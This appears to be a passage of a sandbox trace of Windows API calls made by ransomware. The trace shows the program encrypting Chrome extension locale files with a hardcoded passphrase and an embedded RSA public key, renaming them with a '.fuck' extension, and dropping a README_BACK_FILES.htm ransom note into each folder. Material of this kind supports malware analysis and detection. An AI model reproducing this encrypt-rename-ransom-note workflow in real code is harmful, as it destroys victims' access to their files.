[0249.198] CryptEncrypt (in: hKey=0x29376b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e668*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e668*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.198] WriteFile (in: hFile=0x5d58, lpBuffer=0x293e668*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e668*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.199] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0249.200] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.200] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.200] CloseHandle (hObject=0x5d5c) returned 1 [0249.200] CloseHandle (hObject=0x5d58) returned 1 [0249.200] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), bFailIfExists=0) returned 1 [0249.205] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json", dwFileAttributes=0x0) returned 1 [0249.206] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.gsg")) returned 1 [0249.207] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.fuck")) returned 1 [0249.208] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.208] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.208] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.208] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.208] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.208] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\readme_back_files.htm")) returned 0xffffffff [0249.208] AreFileApisANSI () returned 1 [0249.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.208] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.208] GetFileType (hFile=0x5d54) returned 0x1 [0249.208] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.210] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.210] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.210] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.210] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.210] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.210] GetLastError () returned 0x0 [0249.210] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json")) returned 0x20 [0249.211] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0249.211] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.212] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.212] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.213] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.214] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.214] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.214] CryptHashData (hHash=0x2938978, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.214] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937638) returned 1 [0249.215] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.215] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.215] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e228) returned 1 [0249.215] CryptImportPublicKeyInfo (in: hCryptProv=0x293e228, dwCertEncodingType=0x1, pInfo=0x2932790*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29327c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29327c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937678) returned 1 [0249.215] CryptEncrypt (in: hKey=0x2937678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.215] CryptEncrypt (in: hKey=0x2937678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e2b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e2b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293e2b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e2b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.216] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x117, lpOverlapped=0x0) returned 1 [0249.217] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x117, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0249.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0249.217] CloseHandle (hObject=0x5d58) returned 1 [0249.217] CloseHandle (hObject=0x5d5c) returned 1 [0249.217] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0249.220] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0249.221] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0249.222] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0249.223] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.223] CryptDestroyKey (hKey=0x2937638) returned 1 [0249.223] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.223] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.223] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.223] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0249.223] AreFileApisANSI () returned 1 [0249.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.223] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.223] GetFileType (hFile=0x5d54) returned 0x1 [0249.223] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.225] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.225] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.225] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.225] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.225] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.225] GetLastError () returned 0x0 [0249.225] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json")) returned 0x20 [0249.226] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0249.226] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.227] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.228] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.228] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.230] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.230] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.230] CryptHashData (hHash=0x2938978, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.230] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.230] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.230] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.230] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ec40) returned 1 [0249.230] CryptImportPublicKeyInfo (in: hCryptProv=0x293ec40, dwCertEncodingType=0x1, pInfo=0x2932110*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932140*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932148*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937538) returned 1 [0249.230] CryptEncrypt (in: hKey=0x2937538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.231] CryptEncrypt (in: hKey=0x2937538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e558*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e558*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.231] WriteFile (in: hFile=0x5d58, lpBuffer=0x293e558*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e558*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.232] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xeb, lpOverlapped=0x0) returned 1 [0249.234] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xeb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0249.235] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0249.235] CloseHandle (hObject=0x5d5c) returned 1 [0249.235] CloseHandle (hObject=0x5d58) returned 1 [0249.235] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0249.238] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0249.239] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0249.240] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0249.241] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.241] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.242] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.242] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.242] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.242] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff 